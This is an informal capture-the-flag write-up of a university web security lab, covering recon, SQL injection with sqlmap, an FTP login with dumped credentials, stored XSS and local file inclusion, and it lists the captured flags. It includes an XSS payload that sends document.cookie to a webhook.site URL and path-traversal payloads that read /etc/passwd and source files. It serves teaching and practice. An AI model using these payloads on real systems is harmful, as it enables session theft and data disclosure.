# Hackwekend - Session 1 (Pentester web - Security Lab)
###### tags: `ctf` `network` `exploits` `vulnerable` `top10owasp`
Hi, I am back on series of CTF university LOL. Sorry be in late because i cost me 2 week to solve all flag of website. So let get it and try to learn some new
## 1. Recon Progressing:
- On this step, I will do some kind stuff for recon how to website work and it be on using what tech and port open, any way can be subdomain LOL
- Try with searching directory of website is using the dirsearch - once of best choice using to exploit directory - Try it with python download through this [Link](https://github.com/maurosoria/dirsearch)
- Result of dirsearch is typically cool stuff can find it:
- So cool we find hidden directory is `/.gitignore` with 200 response - Good signal on recon so try to `ctf.wheelife.net/.gititnore`
- Yup we find the flag 1 on hidden directory - coolstuff of challege
> Flag1: Flag{ozIA3akOT7NcAwTa}
- So reach to second step on recon - using nmap to check what port is open
- So we know have twice port open on this website is 21 (Maybe helpful on next step) and yeah definelly have 80 port
- Situation: Can we predict some situation why to **port 21 is opening**:smiling_face_with_smiling_eyes_and_hand_covering_mouth:
- So on next step we need to check what we have with technical of website, like programing language, framework, server, os, ... blah blah?
- So it very easy config, website just have write by PHP and hosting open apache2 and ubuntu LOL
- It spoil for us, how we can try to reach the deep of the website? Highly impact if we know all technical of website
### Conclusion
- Have twice port open 21 and 80
- Wrote in PHP and Hosted on apache2 with ubuntuOS
- Get the 1 flag on hidden route
## 2. Exploit Progressing + GG everything for progressing
### SQLi Exploit
- So look around we can see it have get_wards.php is really really strange it can have to SQLi `http://ctf.wheelife.net/get_wards.php?district_id=1` so try with easy command to test it like ' OR 1=1-- - so it locally have SQLi `http://ctf.wheelife.net/get_wards.php?district_id=1%20OR%201=1--%20-`
- So we know 1 thing using sqlmap - powerful tool to scan SQL injection to dump all of database and get all table from that using command `sqlmap -u ctf.wheelife.net/get_wards.php?district_id=1 --dump`
- So with that command we get the config table really really helpful with second flag and FTP infomation login
- Secondly we know password on login form but we need to know how hash of this - md4 or md5 - sha256 but onething i think it not helpful 
- It have some kind table like comment it have link to `comment.php` 
- And yup i have second flag and reach to ftp server to know what it has :smiley:
> Flag 2: Flag{1NecwrX6WaeCHJmx}
### FTP exploit
- So basically, All of pc have ftp service and you need to up forward that ==> so try command like ssh by: `ftp ctf.wheelife.net`
- Typing the username and password and go through with username:ftpuser - password:Ubuntu_2022_ftpuser
- So i login to that and so using `more files/.flag (scanport and see port 21 is open)`
> Flag 3: Flag{AMFVGVLzhHBNXMAb}
### XSS exploit
- So like i know and base on SQLmap return i have know the comment table is loading in somewhere so with hint it can use it to stealing cookie 
- So with that website we can look see it have 2 input is Name and Content but it just have reflectXSS but onething have some focus on IP and it is can be storedXSS and yup get the payload and return cookie with command on header `X-Forward-For`
> <script>fetch('https://webhook.site/4a85e2af-96a5-454fbd93-fbc0065daa8d/' + document.cookie)</script>
- Result: flag=Flag{/xpeihQtrM+4HRBI}
- So we get the flag 4 and yup it really cool stuff if we got that
> Flag 4: Flag{/xpeihQtrM+4HRBI}
### LFI exploit
- So with cookie above, i can reach this endpoint is admin page with anything change the cookie like `Burpsuite` or `Firefox` reach to the end and we can get the suprising :smiling_face_with_smiling_eyes_and_hand_covering_mouth:
- So it have some route to move somewhere but focus on image we can see that load about somewhat is very strange and it can be have LFI on that 
- So try repeater tab with `burpsuite` i can see it load find content it webfolder and yet we can get the image and i know it have LFI 
- Try basic command like: `file=../../../etc/passwd` and yet we get what we want **Poc of LFI exploit** 
- So gg time, like i know the website which write with PHP and host in apache2 so somekind i get from this page can reach me to source code [Solution to host LAMP web](https://www.digitalocean.com/community/tutorials/how-to-install-linux-apache-mysql-php-lamp-stack-on-ubuntu-20-04)
- So i have somekind idea about that like we can try some payload like
> file=../../../var/www/wheelife/index.php - 500 ERR
> file=../../../var/www/ctf/index.php - 200
- So yet we got the source reach to super strange route is `/page.php`
- Command so importance: **$ini = parse_ini_file('web.conf');**. Give me idea have exist file web.conf so reach that and i find so really suprise 
- Some subdomain like `api.wheelife.net` is have flag.php but it just decoy :smile:, so with that give me no have some secret in flag.php on file i can't see
- So reach that `file=../../../var/www/api/flag.php` and yup secret is spoiled 
> Flag 5: Flag{J3Gzrh18YP9kUig3}
### Conclusion
> The CTF is quitefun but some kind we wait to long to get result or just find that by guess somekind really ending point but it have reasonable comsumtion and not much time to upgrade level :smiley:. But happily to do that and give more change to upgrade to high level :100:. Hoping you get some kind is very cool stuff about this WU. Happy hacking !!!
Sign in with Wallet
Connect another wallet